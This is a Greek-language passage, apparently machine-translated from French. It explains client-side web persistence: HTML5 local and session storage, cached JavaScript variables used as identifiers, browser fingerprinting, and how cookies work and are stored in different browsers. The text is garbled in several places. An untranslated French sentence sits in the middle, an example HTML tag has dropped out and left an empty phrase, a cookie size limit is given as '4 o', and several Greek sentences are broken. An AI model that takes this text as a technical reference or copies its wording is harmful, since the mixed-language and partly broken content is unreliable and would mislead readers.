Μια άλλη κριτική σε αυτό το σύστημα είναι ότι μπορεί να χρησιμοποιηθεί μόνο μέσω της προσθήκης Adobe Flash Player που είναι αποκλειστικό και όχι πρότυπο ιστού.

Επιμονή από την πλευρά του πελάτη

Ορισμένα προγράμματα περιήγησης ιστού υποστηρίζουν έναν μηχανισμό επιμονής που βασίζεται σε σενάρια, ο οποίος επιτρέπει στη σελίδα να αποθηκεύει πληροφορίες τοπικά για μελλοντική χρήση. Ο Internet Explorer, για παράδειγμα, υποστηρίζει μόνιμες πληροφορίες στο ιστορικό του προγράμματος περιήγησης, σε σελιδοδείκτες, σε μορφή αποθηκευμένη σε XML ή απευθείας με μια ιστοσελίδα που είναι αποθηκευμένη στο δίσκο. Για τον Microsoft Internet Explorer 5, υπάρχει μια μέθοδος δεδομένων χρήστη που είναι διαθέσιμη μέσω συμπεριφορών DHTML.

Το W3C εισήγαγε στην HTML 5 ένα νέο JavaScript API για αποθήκευση δεδομένων από την πλευρά του πελάτη που ονομάζεται αποθήκευση Ιστού και είχε ως στόχο τη μόνιμη αντικατάσταση των cookies. Είναι παρόμοιο με τα cookies αλλά με πολύ βελτιωμένη χωρητικότητα και χωρίς αποθήκευση πληροφοριών στην κεφαλίδα των αιτημάτων HTTP. Το API επιτρέπει δύο τύπους αποθήκευσης ιστού: τοπική αποθήκευση και αποθήκευση περιόδου σύνδεσης, παρόμοια με τα μόνιμα cookie και τα cookie περιόδου λειτουργίας (εκτός από το ότι τα cookie περιόδου λειτουργίας λήγουν όταν το πρόγραμμα περιήγησης είναι κλειστό ενώ χώρο αποθήκευσης συνεδριών λήγει όταν κλείσει η καρτέλα), αντίστοιχα. Ο χώρος αποθήκευσης Ιστού υποστηρίζεται από Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 και Opera 10.50.

Ένας διαφορετικός μηχανισμός βασίζεται συνήθως στην προσωρινή αποθήκευση του προγράμματος περιήγησης (στη μνήμη και όχι στην ανανέωση) χρησιμοποιώντας προγράμματα JavaScript σε ιστοσελίδες. 

Για παράδειγμα, μια σελίδα μπορεί να περιέχει την ετικέτα . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Σε αυτό το σημείο, το πρόγραμμα παραμένει στην προσωρινή μνήμη και η σελίδα που επισκεφτήκατε δεν φορτώνεται ξανά για δεύτερη φορά. Συνεπώς, εάν το πρόγραμμα περιέχει μια καθολική μεταβλητή (για παράδειγμα var id = 3243242;), αυτό το αναγνωριστικό παραμένει έγκυρο και μπορεί να χρησιμοποιηθεί από άλλο κώδικα JavaScript μόλις φορτωθεί ξανά η σελίδα ή μόλις φορτωθεί μια σελίδα που συνδέει το πρόγραμμα. 

Το σημαντικότερο μειονέκτημα αυτής της μεθόδου είναι ότι η καθολική μεταβλητή JavaScript πρέπει να είναι στατική, που σημαίνει ότι δεν μπορεί να αλλάξει ή να διαγραφεί όπως ένα cookie.

δακτυλικό αποτύπωμα του προγράμματος περιήγησης Ιστού

Ένα δακτυλικό αποτύπωμα προγράμματος περιήγησης είναι πληροφορίες που συλλέγονται σχετικά με τις ρυθμίσεις διαμόρφωσης ενός προγράμματος περιήγησης για σκοπούς αναγνώρισης. Αυτά τα δακτυλικά αποτυπώματα μπορούν να χρησιμοποιηθούν για την πλήρη ή μερική αναγνώριση ενός χρήστη του Διαδικτύου ή μιας συσκευής ακόμα και όταν τα cookies είναι απενεργοποιημένα.

Οι βασικές πληροφορίες διαμόρφωσης του προγράμματος περιήγησης ιστού έχουν συλλεγεί εδώ και καιρό από υπηρεσίες κοινού ιστότοπου με σκοπό την ακριβή μέτρηση της ανθρώπινης επισκεψιμότητας στον ιστό και τον εντοπισμό διαφόρων μορφών απάτης κλικ. Με τη βοήθεια γλωσσών δέσμης ενεργειών από την πλευρά του πελάτη, η συλλογή πληροφοριών είναι πολύ πιο ακριβής τώρα δυνατό.

Η μετατροπή αυτών των πληροφοριών σε μια συμβολοσειρά bit δημιουργεί ένα δακτυλικό αποτύπωμα συσκευής. Το 2010, το Electronic Frontier Foundation (EFF) μέτρησε την εντροπία του δακτυλικού αποτυπώματος ενός προγράμματος περιήγησης σε τουλάχιστον 18,1 bits, και αυτό συνέβη πριν από την πρόοδο στη λήψη δακτυλικών αποτυπωμάτων σε καμβά προσθέσετε 5,7 bit σε αυτήν την εντροπία.

Μπισκότα με λίγα λόγια

Τα cookies είναι μικρά αρχεία κειμένου που αποθηκεύονται από το πρόγραμμα περιήγησης Ιστού στον σκληρό δίσκο ενός επισκέπτη ιστότοπου και τα οποία χρησιμοποιούνται (μεταξύ άλλων) για την καταγραφή πληροφοριών σχετικά με τον επισκέπτη ή τη διαδρομή του στον ιστότοπο. Ο webmaster μπορεί έτσι να αναγνωρίσει τις συνήθειες ενός επισκέπτη και να εξατομικεύσει την παρουσίαση του ιστότοπού του για κάθε επισκέπτη. Τα cookies επιτρέπουν στη συνέχεια να θυμάστε πόσα άρθρα να εμφανίζονται στην αρχική σελίδα ή ακόμα και να διατηρήσετε τα διαπιστευτήρια σύνδεσης για οποιοδήποτε ιδιωτικό μέρος: όταν ο επισκέπτης επιστρέψει στον ιστότοπο, δεν είναι πλέον απαραίτητο να πληκτρολογήσει το όνομα και τον κωδικό πρόσβασής του στο αναγνωρίζονται, αφού διαβάζονται αυτόματα στο cookie.

Ένα cookie έχει περιορισμένη διάρκεια ζωής, που ορίζεται από τον σχεδιαστή του ιστότοπου. Μπορούν επίσης να λήξουν στο τέλος της συνεδρίας στον ιστότοπο, η οποία αντιστοιχεί στο κλείσιμο του προγράμματος περιήγησης. Τα cookies χρησιμοποιούνται ευρέως για να διευκολύνουν τη ζωή των επισκεπτών και να τους παρουσιάζουν πιο σχετικές πληροφορίες. Όμως ειδικές τεχνικές καθιστούν δυνατή την παρακολούθηση ενός επισκέπτη σε πολλούς ιστότοπους και έτσι τη συλλογή και τη διασταύρωση πολύ εκτεταμένων πληροφοριών για τις συνήθειές του. Αυτή η μέθοδος έχει δώσει στη χρήση των cookies μια φήμη ως τεχνική επιτήρησης που παραβιάζει το απόρρητο των επισκεπτών, κάτι που δυστυχώς ανταποκρίνεται στην πραγματικότητα σε πολλές περιπτώσεις χρήσης για μη τεχνικούς λόγους ή μη σεβασμού των προσδοκιών των χρηστών.

Ως απάντηση σε αυτούς τους εύλογους φόβους, η HTML 5 εισάγει ένα νέο JavaScript API για αποθήκευση δεδομένων από την πλευρά του πελάτη που ονομάζεται αποθήκευση Ιστού, το οποίο είναι πολύ πιο ασφαλές και με μεγαλύτερη χωρητικότητα, το οποίο στοχεύει στην αντικατάσταση των cookies.

Αποθήκευση cookies

Σε ορισμένα προγράμματα περιήγησης, ένα cookie είναι εύκολα επεξεργάσιμο, ένα απλό πρόγραμμα επεξεργασίας κειμένου όπως το Σημειωματάριο αρκεί για να αλλάξει τις τιμές του με μη αυτόματο τρόπο.

Τα cookies αποθηκεύονται διαφορετικά ανάλογα με το πρόγραμμα περιήγησης:

• Microsoft Internet Explorer αποθηκεύει κάθε cookie σε διαφορετικό αρχείο.
• Mozilla Firefox αποθηκεύει όλα τα cookies σε ένα μόνο αρχείο.
• Opera αποθηκεύει όλα τα cookies του σε ένα μόνο αρχείο και τα κρυπτογραφεί (αδύνατη η τροποποίηση τους εκτός από τις επιλογές λογισμικού).
• Apple Safari αποθηκεύει όλα τα cookies σε ένα μόνο αρχείο επέκτασης .plist. Η τροποποίηση είναι δυνατή αλλά δεν είναι πολύ εύκολη, εκτός και αν περάσετε από τις επιλογές λογισμικού.

Απαιτούνται προγράμματα περιήγησης για υποστήριξη το λιγότερο :

• 300 ταυτόχρονα cookies.
• 4 o ανά cookie.
• 20 cookies ανά κεντρικό υπολογιστή ή τομέα.